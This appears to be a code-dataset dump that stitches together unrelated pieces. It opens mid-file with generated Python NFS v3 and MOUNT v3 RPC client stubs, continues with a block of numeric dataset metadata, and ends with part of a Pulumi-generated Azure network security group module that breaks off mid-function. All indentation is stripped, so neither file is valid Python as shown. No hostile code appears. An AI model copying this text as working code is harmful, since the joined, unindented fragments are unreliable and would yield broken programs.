res = self.call(procedure_id, packer.get_buffer())
unpacker = pack.protUnpacker(res)
res = unpacker.unpack_MKNOD3res()
unpacker.done()
return res
# REMOVE3res NFSPROC3_REMOVE(REMOVE3args)
def NFSPROC3_REMOVE(self, p0):
procedure_id = 12
packer = pack.protPacker()
packer.pack_REMOVE3args(p0)
res = self.call(procedure_id, packer.get_buffer())
unpacker = pack.protUnpacker(res)
res = unpacker.unpack_REMOVE3res()
unpacker.done()
return res
# RMDIR3res NFSPROC3_RMDIR(RMDIR3args)
def NFSPROC3_RMDIR(self, p0):
procedure_id = 13
packer = pack.protPacker()
packer.pack_RMDIR3args(p0)
res = self.call(procedure_id, packer.get_buffer())
unpacker = pack.protUnpacker(res)
res = unpacker.unpack_RMDIR3res()
unpacker.done()
return res
# RENAME3res NFSPROC3_RENAME(RENAME3args)
def NFSPROC3_RENAME(self, p0):
procedure_id = 14
packer = pack.protPacker()
packer.pack_RENAME3args(p0)
res = self.call(procedure_id, packer.get_buffer())
unpacker = pack.protUnpacker(res)
res = unpacker.unpack_RENAME3res()
unpacker.done()
return res
# LINK3res NFSPROC3_LINK(LINK3args)
def NFSPROC3_LINK(self, p0):
procedure_id = 15
packer = pack.protPacker()
packer.pack_LINK3args(p0)
res = self.call(procedure_id, packer.get_buffer())
unpacker = pack.protUnpacker(res)
res = unpacker.unpack_LINK3res()
unpacker.done()
return res
# READDIR3res NFSPROC3_READDIR(READDIR3args)
def NFSPROC3_READDIR(self, p0):
procedure_id = 16
packer = pack.protPacker()
packer.pack_READDIR3args(p0)
res = self.call(procedure_id, packer.get_buffer())
unpacker = pack.protUnpacker(res)
res = unpacker.unpack_READDIR3res()
unpacker.done()
return res
# READDIRPLUS3res NFSPROC3_READDIRPLUS(READDIRPLUS3args)
def NFSPROC3_READDIRPLUS(self, p0):
procedure_id = 17
packer = pack.protPacker()
packer.pack_READDIRPLUS3args(p0)
res = self.call(procedure_id, packer.get_buffer())
unpacker = pack.protUnpacker(res)
res = unpacker.unpack_READDIRPLUS3res()
unpacker.done()
return res
# FSSTAT3res NFSPROC3_FSSTAT(FSSTAT3args)
def NFSPROC3_FSSTAT(self, p0):
procedure_id = 18
packer = pack.protPacker()
packer.pack_FSSTAT3args(p0)
res = self.call(procedure_id, packer.get_buffer())
unpacker = pack.protUnpacker(res)
res = unpacker.unpack_FSSTAT3res()
unpacker.done()
return res
# FSINFO3res NFSPROC3_FSINFO(FSINFO3args)
def NFSPROC3_FSINFO(self, p0):
procedure_id = 19
packer = pack.protPacker()
packer.pack_FSINFO3args(p0)
res = self.call(procedure_id, packer.get_buffer())
unpacker = pack.protUnpacker(res)
res = unpacker.unpack_FSINFO3res()
unpacker.done()
return res
# PATHCONF3res NFSPROC3_PATHCONF(PATHCONF3args)
def NFSPROC3_PATHCONF(self, p0):
procedure_id = 20
packer = pack.protPacker()
packer.pack_PATHCONF3args(p0)
res = self.call(procedure_id, packer.get_buffer())
unpacker = pack.protUnpacker(res)
res = unpacker.unpack_PATHCONF3res()
unpacker.done()
return res
# COMMIT3res NFSPROC3_COMMIT(COMMIT3args)
def NFSPROC3_COMMIT(self, p0):
procedure_id = 21
packer = pack.protPacker()
packer.pack_COMMIT3args(p0)
res = self.call(procedure_id, packer.get_buffer())
unpacker = pack.protUnpacker(res)
res = unpacker.unpack_COMMIT3res()
unpacker.done()
return res
class UDPNFS_V3(rpc.UDPClient):
def __init__(self, host, **kwargs):
if 'program' in kwargs or 'version' in kwargs:
raise TypeError('Unexpected keyword argument')
rpc.UDPClient.__init__(self, host, program=const.NFS_PROGRAM, version=const.NFS_V3, **kwargs)
# void NFSPROC3_NULL(void)
def NFSPROC3_NULL(self):
procedure_id = 0
self.call(procedure_id, '')
return None
# GETATTR3res NFSPROC3_GETATTR(GETATTR3args)
def NFSPROC3_GETATTR(self, p0):
procedure_id = 1
packer = pack.protPacker()
packer.pack_GETATTR3args(p0)
res = self.call(procedure_id, packer.get_buffer())
unpacker = pack.protUnpacker(res)
res = unpacker.unpack_GETATTR3res()
unpacker.done()
return res
# SETATTR3res NFSPROC3_SETATTR(SETATTR3args)
def NFSPROC3_SETATTR(self, p0):
procedure_id = 2
packer = pack.protPacker()
packer.pack_SETATTR3args(p0)
res = self.call(procedure_id, packer.get_buffer())
unpacker = pack.protUnpacker(res)
res = unpacker.unpack_SETATTR3res()
unpacker.done()
return res
# LOOKUP3res NFSPROC3_LOOKUP(LOOKUP3args)
def NFSPROC3_LOOKUP(self, p0):
procedure_id = 3
packer = pack.protPacker()
packer.pack_LOOKUP3args(p0)
res = self.call(procedure_id, packer.get_buffer())
unpacker = pack.protUnpacker(res)
res = unpacker.unpack_LOOKUP3res()
unpacker.done()
return res
# ACCESS3res NFSPROC3_ACCESS(ACCESS3args)
def NFSPROC3_ACCESS(self, p0):
procedure_id = 4
packer = pack.protPacker()
packer.pack_ACCESS3args(p0)
res = self.call(procedure_id, packer.get_buffer())
unpacker = pack.protUnpacker(res)
res = unpacker.unpack_ACCESS3res()
unpacker.done()
return res
# READLINK3res NFSPROC3_READLINK(READLINK3args)
def NFSPROC3_READLINK(self, p0):
procedure_id = 5
packer = pack.protPacker()
packer.pack_READLINK3args(p0)
res = self.call(procedure_id, packer.get_buffer())
unpacker = pack.protUnpacker(res)
res = unpacker.unpack_READLINK3res()
unpacker.done()
return res
# READ3res NFSPROC3_READ(READ3args)
def NFSPROC3_READ(self, p0):
procedure_id = 6
packer = pack.protPacker()
packer.pack_READ3args(p0)
res = self.call(procedure_id, packer.get_buffer())
unpacker = pack.protUnpacker(res)
res = unpacker.unpack_READ3res()
unpacker.done()
return res
# WRITE3res NFSPROC3_WRITE(WRITE3args)
def NFSPROC3_WRITE(self, p0):
procedure_id = 7
packer = pack.protPacker()
packer.pack_WRITE3args(p0)
res = self.call(procedure_id, packer.get_buffer())
unpacker = pack.protUnpacker(res)
res = unpacker.unpack_WRITE3res()
unpacker.done()
return res
# CREATE3res NFSPROC3_CREATE(CREATE3args)
def NFSPROC3_CREATE(self, p0):
procedure_id = 8
packer = pack.protPacker()
packer.pack_CREATE3args(p0)
res = self.call(procedure_id, packer.get_buffer())
unpacker = pack.protUnpacker(res)
res = unpacker.unpack_CREATE3res()
unpacker.done()
return res
# MKDIR3res NFSPROC3_MKDIR(MKDIR3args)
def NFSPROC3_MKDIR(self, p0):
procedure_id = 9
packer = pack.protPacker()
packer.pack_MKDIR3args(p0)
res = self.call(procedure_id, packer.get_buffer())
unpacker = pack.protUnpacker(res)
res = unpacker.unpack_MKDIR3res()
unpacker.done()
return res
# SYMLINK3res NFSPROC3_SYMLINK(SYMLINK3args)
def NFSPROC3_SYMLINK(self, p0):
procedure_id = 10
packer = pack.protPacker()
packer.pack_SYMLINK3args(p0)
res = self.call(procedure_id, packer.get_buffer())
unpacker = pack.protUnpacker(res)
res = unpacker.unpack_SYMLINK3res()
unpacker.done()
return res
# MKNOD3res NFSPROC3_MKNOD(MKNOD3args)
def NFSPROC3_MKNOD(self, p0):
procedure_id = 11
packer = pack.protPacker()
packer.pack_MKNOD3args(p0)
res = self.call(procedure_id, packer.get_buffer())
unpacker = pack.protUnpacker(res)
res = unpacker.unpack_MKNOD3res()
unpacker.done()
return res
# REMOVE3res NFSPROC3_REMOVE(REMOVE3args)
def NFSPROC3_REMOVE(self, p0):
procedure_id = 12
packer = pack.protPacker()
packer.pack_REMOVE3args(p0)
res = self.call(procedure_id, packer.get_buffer())
unpacker = pack.protUnpacker(res)
res = unpacker.unpack_REMOVE3res()
unpacker.done()
return res
# RMDIR3res NFSPROC3_RMDIR(RMDIR3args)
def NFSPROC3_RMDIR(self, p0):
procedure_id = 13
packer = pack.protPacker()
packer.pack_RMDIR3args(p0)
res = self.call(procedure_id, packer.get_buffer())
unpacker = pack.protUnpacker(res)
res = unpacker.unpack_RMDIR3res()
unpacker.done()
return res
# RENAME3res NFSPROC3_RENAME(RENAME3args)
def NFSPROC3_RENAME(self, p0):
procedure_id = 14
packer = pack.protPacker()
packer.pack_RENAME3args(p0)
res = self.call(procedure_id, packer.get_buffer())
unpacker = pack.protUnpacker(res)
res = unpacker.unpack_RENAME3res()
unpacker.done()
return res
# LINK3res NFSPROC3_LINK(LINK3args)
def NFSPROC3_LINK(self, p0):
procedure_id = 15
packer = pack.protPacker()
packer.pack_LINK3args(p0)
res = self.call(procedure_id, packer.get_buffer())
unpacker = pack.protUnpacker(res)
res = unpacker.unpack_LINK3res()
unpacker.done()
return res
# READDIR3res NFSPROC3_READDIR(READDIR3args)
def NFSPROC3_READDIR(self, p0):
procedure_id = 16
packer = pack.protPacker()
packer.pack_READDIR3args(p0)
res = self.call(procedure_id, packer.get_buffer())
unpacker = pack.protUnpacker(res)
res = unpacker.unpack_READDIR3res()
unpacker.done()
return res
# READDIRPLUS3res NFSPROC3_READDIRPLUS(READDIRPLUS3args)
def NFSPROC3_READDIRPLUS(self, p0):
procedure_id = 17
packer = pack.protPacker()
packer.pack_READDIRPLUS3args(p0)
res = self.call(procedure_id, packer.get_buffer())
unpacker = pack.protUnpacker(res)
res = unpacker.unpack_READDIRPLUS3res()
unpacker.done()
return res
# FSSTAT3res NFSPROC3_FSSTAT(FSSTAT3args)
def NFSPROC3_FSSTAT(self, p0):
procedure_id = 18
packer = pack.protPacker()
packer.pack_FSSTAT3args(p0)
res = self.call(procedure_id, packer.get_buffer())
unpacker = pack.protUnpacker(res)
res = unpacker.unpack_FSSTAT3res()
unpacker.done()
return res
# FSINFO3res NFSPROC3_FSINFO(FSINFO3args)
def NFSPROC3_FSINFO(self, p0):
procedure_id = 19
packer = pack.protPacker()
packer.pack_FSINFO3args(p0)
res = self.call(procedure_id, packer.get_buffer())
unpacker = pack.protUnpacker(res)
res = unpacker.unpack_FSINFO3res()
unpacker.done()
return res
# PATHCONF3res NFSPROC3_PATHCONF(PATHCONF3args)
def NFSPROC3_PATHCONF(self, p0):
procedure_id = 20
packer = pack.protPacker()
packer.pack_PATHCONF3args(p0)
res = self.call(procedure_id, packer.get_buffer())
unpacker = pack.protUnpacker(res)
res = unpacker.unpack_PATHCONF3res()
unpacker.done()
return res
# COMMIT3res NFSPROC3_COMMIT(COMMIT3args)
def NFSPROC3_COMMIT(self, p0):
procedure_id = 21
packer = pack.protPacker()
packer.pack_COMMIT3args(p0)
res = self.call(procedure_id, packer.get_buffer())
unpacker = pack.protUnpacker(res)
res = unpacker.unpack_COMMIT3res()
unpacker.done()
return res
def __getitem__(self, key):
d = {
const.RawTCPNFS_V3 : 'RawTCPNFS_V3',
const.TCPNFS_V3 : 'TCPNFS_V3',
const.RawUDPNFS_V3 : 'RawUDPNFS_V3',
const.UDPNFS_V3 : 'UDPNFS_V3'
}
return getattr(self, d[key])
NFS_PROGRAM = NFS_PROGRAM()
class MOUNT_PROGRAM(object):
class RawTCPMOUNT_V3(rpc.RawTCPClient):
def __init__(self, host, port, **kwargs):
if 'program' in kwargs or 'version' in kwargs:
raise TypeError('Unexpected keyword argument')
rpc.RawTCPClient.__init__(self, host, port, program=const.MOUNT_PROGRAM, version=const.MOUNT_V3, **kwargs)
# void MOUNTPROC3_NULL(void)
def MOUNTPROC3_NULL(self):
procedure_id = 0
self.call(procedure_id, '')
return None
# mountres3 MOUNTPROC3_MNT(dirpath3)
def MOUNTPROC3_MNT(self, p0):
procedure_id = 1
packer = pack.protPacker()
packer.pack_dirpath3(p0)
res = self.call(procedure_id, packer.get_buffer())
unpacker = pack.protUnpacker(res)
res = unpacker.unpack_mountres3()
unpacker.done()
return res
# mountopt3 MOUNTPROC3_DUMP(void)
def MOUNTPROC3_DUMP(self):
procedure_id = 2
res = self.call(procedure_id, '')
unpacker = pack.protUnpacker(res)
res = unpacker.unpack_mountopt3()
unpacker.done()
return res
# void MOUNTPROC3_UMNT(dirpath3)
def MOUNTPROC3_UMNT(self, p0):
procedure_id = 3
packer = pack.protPacker()
packer.pack_dirpath3(p0)
self.call(procedure_id, packer.get_buffer())
return None
# void MOUNTPROC3_UMNTALL(void)
def MOUNTPROC3_UMNTALL(self):
procedure_id = 4
self.call(procedure_id, '')
return None
# exportsopt3 MOUNTPROC3_EXPORT(void)
def MOUNTPROC3_EXPORT(self):
procedure_id = 5
res = self.call(procedure_id, '')
unpacker = pack.protUnpacker(res)
res = unpacker.unpack_exportsopt3()
unpacker.done()
return res
class TCPMOUNT_V3(rpc.TCPClient):
def __init__(self, host, **kwargs):
if 'program' in kwargs or 'version' in kwargs:
raise TypeError('Unexpected keyword argument')
rpc.TCPClient.__init__(self, host, program=const.MOUNT_PROGRAM, version=const.MOUNT_V3, **kwargs)
# void MOUNTPROC3_NULL(void)
def MOUNTPROC3_NULL(self):
procedure_id = 0
self.call(procedure_id, '')
return None
# mountres3 MOUNTPROC3_MNT(dirpath3)
def MOUNTPROC3_MNT(self, p0):
procedure_id = 1
packer = pack.protPacker()
packer.pack_dirpath3(p0)
res = self.call(procedure_id, packer.get_buffer())
unpacker = pack.protUnpacker(res)
res = unpacker.unpack_mountres3()
unpacker.done()
return res
# mountopt3 MOUNTPROC3_DUMP(void)
def MOUNTPROC3_DUMP(self):
procedure_id = 2
res = self.call(procedure_id, '')
unpacker = pack.protUnpacker(res)
res = unpacker.unpack_mountopt3()
unpacker.done()
return res
# void MOUNTPROC3_UMNT(dirpath3)
def MOUNTPROC3_UMNT(self, p0):
procedure_id = 3
packer = pack.protPacker()
packer.pack_dirpath3(p0)
self.call(procedure_id, packer.get_buffer())
return None
# void MOUNTPROC3_UMNTALL(void)
def MOUNTPROC3_UMNTALL(self):
procedure_id = 4
self.call(procedure_id, '')
return None
# exportsopt3 MOUNTPROC3_EXPORT(void)
def MOUNTPROC3_EXPORT(self):
procedure_id = 5
res = self.call(procedure_id, '')
unpacker = pack.protUnpacker(res)
res = unpacker.unpack_exportsopt3()
unpacker.done()
return res
class RawUDPMOUNT_V3(rpc.RawUDPClient):
def __init__(self, host, port, **kwargs):
if 'program' in kwargs or 'version' in kwargs:
raise TypeError('Unexpected keyword argument')
rpc.RawUDPClient.__init__(self, host, port, program=const.MOUNT_PROGRAM, version=const.MOUNT_V3, **kwargs)
# void MOUNTPROC3_NULL(void)
def MOUNTPROC3_NULL(self):
procedure_id = 0
self.call(procedure_id, '')
return None
# mountres3 MOUNTPROC3_MNT(dirpath3)
def MOUNTPROC3_MNT(self, p0):
procedure_id = 1
packer = pack.protPacker()
packer.pack_dirpath3(p0)
res = self.call(procedure_id, packer.get_buffer())
unpacker = pack.protUnpacker(res)
res = unpacker.unpack_mountres3()
unpacker.done()
return res
# mountopt3 MOUNTPROC3_DUMP(void)
def MOUNTPROC3_DUMP(self):
procedure_id = 2
res = self.call(procedure_id, '')
unpacker = pack.protUnpacker(res)
res = unpacker.unpack_mountopt3()
unpacker.done()
return res
# void MOUNTPROC3_UMNT(dirpath3)
def MOUNTPROC3_UMNT(self, p0):
procedure_id = 3
packer = pack.protPacker()
packer.pack_dirpath3(p0)
self.call(procedure_id, packer.get_buffer())
return None
# void MOUNTPROC3_UMNTALL(void)
def MOUNTPROC3_UMNTALL(self):
procedure_id = 4
self.call(procedure_id, '')
return None
# exportsopt3 MOUNTPROC3_EXPORT(void)
def MOUNTPROC3_EXPORT(self):
procedure_id = 5
res = self.call(procedure_id, '')
unpacker = pack.protUnpacker(res)
res = unpacker.unpack_exportsopt3()
unpacker.done()
return res
class UDPMOUNT_V3(rpc.UDPClient):
def __init__(self, host, **kwargs):
if 'program' in kwargs or 'version' in kwargs:
raise TypeError('Unexpected keyword argument')
rpc.UDPClient.__init__(self, host, program=const.MOUNT_PROGRAM, version=const.MOUNT_V3, **kwargs)
# void MOUNTPROC3_NULL(void)
def MOUNTPROC3_NULL(self):
procedure_id = 0
self.call(procedure_id, '')
return None
# mountres3 MOUNTPROC3_MNT(dirpath3)
def MOUNTPROC3_MNT(self, p0):
procedure_id = 1
packer = pack.protPacker()
packer.pack_dirpath3(p0)
res = self.call(procedure_id, packer.get_buffer())
unpacker = pack.protUnpacker(res)
res = unpacker.unpack_mountres3()
unpacker.done()
return res
# mountopt3 MOUNTPROC3_DUMP(void)
def MOUNTPROC3_DUMP(self):
procedure_id = 2
res = self.call(procedure_id, '')
unpacker = pack.protUnpacker(res)
res = unpacker.unpack_mountopt3()
unpacker.done()
return res
# void MOUNTPROC3_UMNT(dirpath3)
def MOUNTPROC3_UMNT(self, p0):
procedure_id = 3
packer = pack.protPacker()
packer.pack_dirpath3(p0)
self.call(procedure_id, packer.get_buffer())
return None
# void MOUNTPROC3_UMNTALL(void)
def MOUNTPROC3_UMNTALL(self):
procedure_id = 4
self.call(procedure_id, '')
return None
# exportsopt3 MOUNTPROC3_EXPORT(void)
def MOUNTPROC3_EXPORT(self):
procedure_id = 5
res = self.call(procedure_id, '')
unpacker = pack.protUnpacker(res)
res = unpacker.unpack_exportsopt3()
unpacker.done()
return res
def __getitem__(self, key):
d = {
const.RawTCPMOUNT_V3 : 'RawTCPMOUNT_V3',
const.TCPMOUNT_V3 : 'TCPMOUNT_V3',
const.RawUDPMOUNT_V3 : 'RawUDPMOUNT_V3',
const.UDPMOUNT_V3 : 'UDPMOUNT_V3'
}
return getattr(self, d[key])
MOUNT_PROGRAM = MOUNT_PROGRAM()
| 36.553191
| 118
| 0.575983
| 4,379
| 44,668
| 5.682119
| 0.038822
| 0.099027
| 0.076521
| 0.085524
| 0.981191
| 0.981191
| 0.979343
| 0.979343
| 0.979343
| 0.979343
| 0
| 0.033559
| 0.3389
| 44,668
| 1,221
| 119
| 36.583129
| 0.809042
| 0.098146
| 0
| 0.966429
| 1
| 0
| 0.010456
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.12411
| false
| 0
| 0.003052
| 0
| 0.253306
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
7dea44f63a645f019d4fb818f87af4ff442cfa09
| 19,826
|
py
|
Python
|
sdk/python/pulumi_azure/network/network_security_group.py
|
henriktao/pulumi-azure
|
f1cbcf100b42b916da36d8fe28be3a159abaf022
|
[
"ECL-2.0",
"Apache-2.0"
] | 109
|
2018-06-18T00:19:44.000Z
|
2022-02-20T05:32:57.000Z
|
sdk/python/pulumi_azure/network/network_security_group.py
|
henriktao/pulumi-azure
|
f1cbcf100b42b916da36d8fe28be3a159abaf022
|
[
"ECL-2.0",
"Apache-2.0"
] | 663
|
2018-06-18T21:08:46.000Z
|
2022-03-31T20:10:11.000Z
|
sdk/python/pulumi_azure/network/network_security_group.py
|
henriktao/pulumi-azure
|
f1cbcf100b42b916da36d8fe28be3a159abaf022
|
[
"ECL-2.0",
"Apache-2.0"
] | 41
|
2018-07-19T22:37:38.000Z
|
2022-03-14T10:56:26.000Z
|
# coding=utf-8
# *** WARNING: this file was generated by the Pulumi Terraform Bridge (tfgen) Tool. ***
# *** Do not edit by hand unless you're certain you know what you are doing! ***
import warnings
import pulumi
import pulumi.runtime
from typing import Any, Mapping, Optional, Sequence, Union, overload
from .. import _utilities
from . import outputs
from ._inputs import *
__all__ = ['NetworkSecurityGroupArgs', 'NetworkSecurityGroup']
@pulumi.input_type
class NetworkSecurityGroupArgs:
def __init__(__self__, *,
resource_group_name: pulumi.Input[str],
location: Optional[pulumi.Input[str]] = None,
name: Optional[pulumi.Input[str]] = None,
security_rules: Optional[pulumi.Input[Sequence[pulumi.Input['NetworkSecurityGroupSecurityRuleArgs']]]] = None,
tags: Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]] = None):
"""
The set of arguments for constructing a NetworkSecurityGroup resource.
:param pulumi.Input[str] resource_group_name: The name of the resource group in which to create the network security group. Changing this forces a new resource to be created.
:param pulumi.Input[str] location: Specifies the supported Azure location where the resource exists. Changing this forces a new resource to be created.
:param pulumi.Input[str] name: The name of the security rule.
:param pulumi.Input[Sequence[pulumi.Input['NetworkSecurityGroupSecurityRuleArgs']]] security_rules: A list of objects representing security rules, as defined below.
:param pulumi.Input[Mapping[str, pulumi.Input[str]]] tags: A mapping of tags to assign to the resource.
"""
pulumi.set(__self__, "resource_group_name", resource_group_name)
if location is not None:
pulumi.set(__self__, "location", location)
if name is not None:
pulumi.set(__self__, "name", name)
if security_rules is not None:
pulumi.set(__self__, "security_rules", security_rules)
if tags is not None:
pulumi.set(__self__, "tags", tags)
@property
@pulumi.getter(name="resourceGroupName")
def resource_group_name(self) -> pulumi.Input[str]:
"""
The name of the resource group in which to create the network security group. Changing this forces a new resource to be created.
"""
return pulumi.get(self, "resource_group_name")
@resource_group_name.setter
def resource_group_name(self, value: pulumi.Input[str]):
pulumi.set(self, "resource_group_name", value)
@property
@pulumi.getter
def location(self) -> Optional[pulumi.Input[str]]:
"""
Specifies the supported Azure location where the resource exists. Changing this forces a new resource to be created.
"""
return pulumi.get(self, "location")
@location.setter
def location(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "location", value)
@property
@pulumi.getter
def name(self) -> Optional[pulumi.Input[str]]:
"""
The name of the security rule.
"""
return pulumi.get(self, "name")
@name.setter
def name(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "name", value)
@property
@pulumi.getter(name="securityRules")
def security_rules(self) -> Optional[pulumi.Input[Sequence[pulumi.Input['NetworkSecurityGroupSecurityRuleArgs']]]]:
"""
A list of objects representing security rules, as defined below.
"""
return pulumi.get(self, "security_rules")
@security_rules.setter
def security_rules(self, value: Optional[pulumi.Input[Sequence[pulumi.Input['NetworkSecurityGroupSecurityRuleArgs']]]]):
pulumi.set(self, "security_rules", value)
@property
@pulumi.getter
def tags(self) -> Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]]:
"""
A mapping of tags to assign to the resource.
"""
return pulumi.get(self, "tags")
@tags.setter
def tags(self, value: Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]]):
pulumi.set(self, "tags", value)
@pulumi.input_type
class _NetworkSecurityGroupState:
def __init__(__self__, *,
location: Optional[pulumi.Input[str]] = None,
name: Optional[pulumi.Input[str]] = None,
resource_group_name: Optional[pulumi.Input[str]] = None,
security_rules: Optional[pulumi.Input[Sequence[pulumi.Input['NetworkSecurityGroupSecurityRuleArgs']]]] = None,
tags: Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]] = None):
"""
Input properties used for looking up and filtering NetworkSecurityGroup resources.
:param pulumi.Input[str] location: Specifies the supported Azure location where the resource exists. Changing this forces a new resource to be created.
:param pulumi.Input[str] name: The name of the security rule.
:param pulumi.Input[str] resource_group_name: The name of the resource group in which to create the network security group. Changing this forces a new resource to be created.
:param pulumi.Input[Sequence[pulumi.Input['NetworkSecurityGroupSecurityRuleArgs']]] security_rules: A list of objects representing security rules, as defined below.
:param pulumi.Input[Mapping[str, pulumi.Input[str]]] tags: A mapping of tags to assign to the resource.
"""
if location is not None:
pulumi.set(__self__, "location", location)
if name is not None:
pulumi.set(__self__, "name", name)
if resource_group_name is not None:
pulumi.set(__self__, "resource_group_name", resource_group_name)
if security_rules is not None:
pulumi.set(__self__, "security_rules", security_rules)
if tags is not None:
pulumi.set(__self__, "tags", tags)
@property
@pulumi.getter
def location(self) -> Optional[pulumi.Input[str]]:
"""
Specifies the supported Azure location where the resource exists. Changing this forces a new resource to be created.
"""
return pulumi.get(self, "location")
@location.setter
def location(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "location", value)
@property
@pulumi.getter
def name(self) -> Optional[pulumi.Input[str]]:
"""
The name of the security rule.
"""
return pulumi.get(self, "name")
@name.setter
def name(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "name", value)
@property
@pulumi.getter(name="resourceGroupName")
def resource_group_name(self) -> Optional[pulumi.Input[str]]:
"""
The name of the resource group in which to create the network security group. Changing this forces a new resource to be created.
"""
return pulumi.get(self, "resource_group_name")
@resource_group_name.setter
def resource_group_name(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "resource_group_name", value)
@property
@pulumi.getter(name="securityRules")
def security_rules(self) -> Optional[pulumi.Input[Sequence[pulumi.Input['NetworkSecurityGroupSecurityRuleArgs']]]]:
"""
A list of objects representing security rules, as defined below.
"""
return pulumi.get(self, "security_rules")
@security_rules.setter
def security_rules(self, value: Optional[pulumi.Input[Sequence[pulumi.Input['NetworkSecurityGroupSecurityRuleArgs']]]]):
pulumi.set(self, "security_rules", value)
@property
@pulumi.getter
def tags(self) -> Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]]:
"""
A mapping of tags to assign to the resource.
"""
return pulumi.get(self, "tags")
@tags.setter
def tags(self, value: Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]]):
pulumi.set(self, "tags", value)
class NetworkSecurityGroup(pulumi.CustomResource):
@overload
def __init__(__self__,
resource_name: str,
opts: Optional[pulumi.ResourceOptions] = None,
location: Optional[pulumi.Input[str]] = None,
name: Optional[pulumi.Input[str]] = None,
resource_group_name: Optional[pulumi.Input[str]] = None,
security_rules: Optional[pulumi.Input[Sequence[pulumi.Input[pulumi.InputType['NetworkSecurityGroupSecurityRuleArgs']]]]] = None,
tags: Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]] = None,
__props__=None):
"""
Manages a network security group that contains a list of network security rules. Network security groups enable inbound or outbound traffic to be enabled or denied.
> **NOTE on Network Security Groups and Network Security Rules:** This provider currently
provides both a standalone Network Security Rule resource, and allows for Network Security Rules to be defined in-line within the Network Security Group resource.
At this time you cannot use a Network Security Group with in-line Network Security Rules in conjunction with any Network Security Rule resources. Doing so will cause a conflict of rule settings and will overwrite rules.
## Example Usage
```python
import pulumi
import pulumi_azure as azure
example_resource_group = azure.core.ResourceGroup("exampleResourceGroup", location="West Europe")
example_network_security_group = azure.network.NetworkSecurityGroup("exampleNetworkSecurityGroup",
location=example_resource_group.location,
resource_group_name=example_resource_group.name,
security_rules=[azure.network.NetworkSecurityGroupSecurityRuleArgs(
name="test123",
priority=100,
direction="Inbound",
access="Allow",
protocol="Tcp",
source_port_range="*",
destination_port_range="*",
source_address_prefix="*",
destination_address_prefix="*",
)],
tags={
"environment": "Production",
})
```
## Import
Network Security Groups can be imported using the `resource id`, e.g.
```sh
$ pulumi import azure:network/networkSecurityGroup:NetworkSecurityGroup group1 /subscriptions/00000000-0000-0000-0000-000000000000/resourceGroups/mygroup1/providers/Microsoft.Network/networkSecurityGroups/mySecurityGroup
```
:param str resource_name: The name of the resource.
:param pulumi.ResourceOptions opts: Options for the resource.
:param pulumi.Input[str] location: Specifies the supported Azure location where the resource exists. Changing this forces a new resource to be created.
:param pulumi.Input[str] name: The name of the security rule.
:param pulumi.Input[str] resource_group_name: The name of the resource group in which to create the network security group. Changing this forces a new resource to be created.
:param pulumi.Input[Sequence[pulumi.Input[pulumi.InputType['NetworkSecurityGroupSecurityRuleArgs']]]] security_rules: A list of objects representing security rules, as defined below.
:param pulumi.Input[Mapping[str, pulumi.Input[str]]] tags: A mapping of tags to assign to the resource.
"""
...
@overload
def __init__(__self__,
resource_name: str,
args: NetworkSecurityGroupArgs,
opts: Optional[pulumi.ResourceOptions] = None):
"""
Manages a network security group that contains a list of network security rules. Network security groups enable inbound or outbound traffic to be enabled or denied.
> **NOTE on Network Security Groups and Network Security Rules:** This provider currently
provides both a standalone Network Security Rule resource, and allows for Network Security Rules to be defined in-line within the Network Security Group resource.
At this time you cannot use a Network Security Group with in-line Network Security Rules in conjunction with any Network Security Rule resources. Doing so will cause a conflict of rule settings and will overwrite rules.
## Example Usage
```python
import pulumi
import pulumi_azure as azure
example_resource_group = azure.core.ResourceGroup("exampleResourceGroup", location="West Europe")
example_network_security_group = azure.network.NetworkSecurityGroup("exampleNetworkSecurityGroup",
location=example_resource_group.location,
resource_group_name=example_resource_group.name,
security_rules=[azure.network.NetworkSecurityGroupSecurityRuleArgs(
name="test123",
priority=100,
direction="Inbound",
access="Allow",
protocol="Tcp",
source_port_range="*",
destination_port_range="*",
source_address_prefix="*",
destination_address_prefix="*",
)],
tags={
"environment": "Production",
})
```
## Import
Network Security Groups can be imported using the `resource id`, e.g.
```sh
$ pulumi import azure:network/networkSecurityGroup:NetworkSecurityGroup group1 /subscriptions/00000000-0000-0000-0000-000000000000/resourceGroups/mygroup1/providers/Microsoft.Network/networkSecurityGroups/mySecurityGroup
```
:param str resource_name: The name of the resource.
:param NetworkSecurityGroupArgs args: The arguments to use to populate this resource's properties.
:param pulumi.ResourceOptions opts: Options for the resource.
"""
...
def __init__(__self__, resource_name: str, *args, **kwargs):
resource_args, opts = _utilities.get_resource_args_opts(NetworkSecurityGroupArgs, pulumi.ResourceOptions, *args, **kwargs)
if resource_args is not None:
__self__._internal_init(resource_name, opts, **resource_args.__dict__)
else:
__self__._internal_init(resource_name, *args, **kwargs)
def _internal_init(__self__,
resource_name: str,
opts: Optional[pulumi.ResourceOptions] = None,
location: Optional[pulumi.Input[str]] = None,
name: Optional[pulumi.Input[str]] = None,
resource_group_name: Optional[pulumi.Input[str]] = None,
security_rules: Optional[pulumi.Input[Sequence[pulumi.Input[pulumi.InputType['NetworkSecurityGroupSecurityRuleArgs']]]]] = None,
tags: Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]] = None,
__props__=None):
if opts is None:
opts = pulumi.ResourceOptions()
if not isinstance(opts, pulumi.ResourceOptions):
raise TypeError('Expected resource options to be a ResourceOptions instance')
if opts.version is None:
opts.version = _utilities.get_version()
if opts.id is None:
if __props__ is not None:
raise TypeError('__props__ is only valid when passed in combination with a valid opts.id to get an existing resource')
